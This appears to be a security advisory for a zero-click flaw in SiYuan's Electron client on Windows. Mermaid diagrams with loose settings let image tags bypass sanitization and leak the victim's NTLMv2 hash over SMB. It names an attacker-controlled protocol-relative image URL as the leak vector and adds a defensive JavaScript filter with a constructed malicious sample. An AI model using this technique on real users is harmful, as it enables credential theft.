Impact
SiYuan, a personal knowledge management system, allows Mermaid diagrams to be rendered with settings that enable HTML labels and a ‘loose’ security level. In this configuration <img> tags can escape the internal DOMPurify filter and end up inside SVG foreignObject blocks. The SVG content is injected into the page using innerHTML without additional sanitization, leading to a zero‑click vulnerability. When a user opens a note containing a malicious Mermaid diagram, the Electron client automatically fetches the image URL. On Windows, a protocol‑relative URL such as //attacker.com/image.png resolves to a UNC path, which triggers SMB authentication and causes Windows to send the victim’s NTLMv2 hash to the target. The attacker can capture this credential and later use it in pass‑the‑hash attacks or other credential‑based exploitation scenarios.
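The two defensive checks a maintainer would want here are a configuration audit (is the renderer still running Mermaid with the `securityLevel: 'loose'` / `htmlLabels: true` combination described above?) and a last-line filter that refuses protocol-relative, UNC and file URLs in image references before rendered SVG reaches `innerHTML`. The block below is an added example written for this page, not SiYuan's or Mermaid's own code: the two config objects only mirror the names of Mermaid's `securityLevel` and `htmlLabels` options and are never passed to Mermaid, the allow-list of image origins, the regex-based scanner and the `placeholder.invalid` / `assets.example` hosts in the constructed sample SVG are all assumptions, and a production filter should walk the parsed DOM (or hook DOMPurify) rather than scan markup with a regular expression.

```javascript
// Weak vs hardened renderer settings. Mirrors Mermaid's option names only;
// these objects are illustrative and are not handed to Mermaid here.
const weakMermaidConfig = { securityLevel: 'loose', htmlLabels: true };
const hardenedMermaidConfig = { securityLevel: 'strict', htmlLabels: false };

// Audit helper: the vulnerable combination is anything other than
// 'strict' with HTML labels disabled.
function mermaidConfigIsHardened(cfg) {
  return cfg.securityLevel === 'strict' && cfg.htmlLabels !== true;
}

// Classify an image src by how the platform would resolve it.
// '//host/path' is the protocol-relative form that Windows maps to a
// UNC path and therefore to an SMB authentication attempt.
function classifyImageSrc(src) {
  const s = String(src).trim();
  if (s.startsWith('\\\\')) return 'unc';                // \\host\share\file
  if (s.startsWith('//')) return 'protocol-relative';    // //host/path
  if (/^file:/i.test(s)) return 'file';
  if (/^data:image\//i.test(s)) return 'inline';
  if (/^https?:\/\//i.test(s)) return 'remote';
  return 'relative';
}

// Only inline data URIs and remote images from an explicit origin
// allow-list survive; everything that could resolve to a local or
// SMB path is rejected.
function isAllowedImageSrc(src, allowedOrigins) {
  const kind = classifyImageSrc(src);
  if (kind === 'inline') return true;
  if (kind === 'remote') {
    try {
      return allowedOrigins.includes(new URL(src).origin);
    } catch {
      return false;
    }
  }
  return false;
}

// Regex scanner for <img ... src="..."> inside rendered SVG markup.
// Assumption: demonstrative only; real code should operate on the DOM.
const IMG_RE = /<img\b[^>]*?\bsrc\s*=\s*(["'])(.*?)\1[^>]*>/gi;

// Remove any <img> whose src is not allowed and report what was dropped,
// so the event can be logged as a possible credential-leak attempt.
function stripUnsafeImages(svg, allowedOrigins) {
  const removed = [];
  const cleaned = svg.replace(IMG_RE, (tag, _quote, src) => {
    if (isAllowedImageSrc(src, allowedOrigins)) return tag;
    removed.push(src);
    return '';
  });
  return { svg: cleaned, removed };
}

// Constructed sample of what a rendered diagram's foreignObject block
// might contain after the filter bypass; hosts are placeholders.
const sampleSvg = [
  '<svg><foreignObject>',
  '<div><img src="https://assets.example/logo.png" alt="ok">',
  '<img src="//placeholder.invalid/pixel.png" alt="escaped">',
  '</div></foreignObject></svg>',
].join('');

function demo() {
  return stripUnsafeImages(sampleSvg, ['https://assets.example']);
}

console.log(mermaidConfigIsHardened(weakMermaidConfig));     // false
console.log(mermaidConfigIsHardened(hardenedMermaidConfig)); // true
console.log(demo().removed);                                 // [ '//placeholder.invalid/pixel.png' ]
```

Running `demo()` keeps the allow-listed remote image and strips the protocol-relative one, returning the dropped `src` values so the client can surface them in a log entry; pairing this with the hardened configuration removes both the bypass path (HTML labels in `loose` mode) and the sink (unfiltered image references in `innerHTML`).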
Affected Systems
The issue affects the SiYuan application version 3.6.3 and earlier. The vulnerable component is the Electron client running on Windows operating systems. The affected environment includes any user who opens a note containing a Mermaid diagram with an image reference that can resolve to a UNC path. The vendor product is Siyuan-Note Siyuan.
Risk and Exploitability
The CVSS score for this vulnerability is 8.7, indicating high severity. While an EPSS score is not provided, the zero‑click nature and the ability to exfiltrate NTLM hashes without user interaction suggest a high likelihood of exploitation in environments where users work with potentially untrusted content. The vulnerability is not currently listed in the CISA KEV catalog. An attack requires only that the user open a malicious note; no additional permissions or input are necessary beyond normal use of the application.
OpenCVE Enrichment
Github GHSA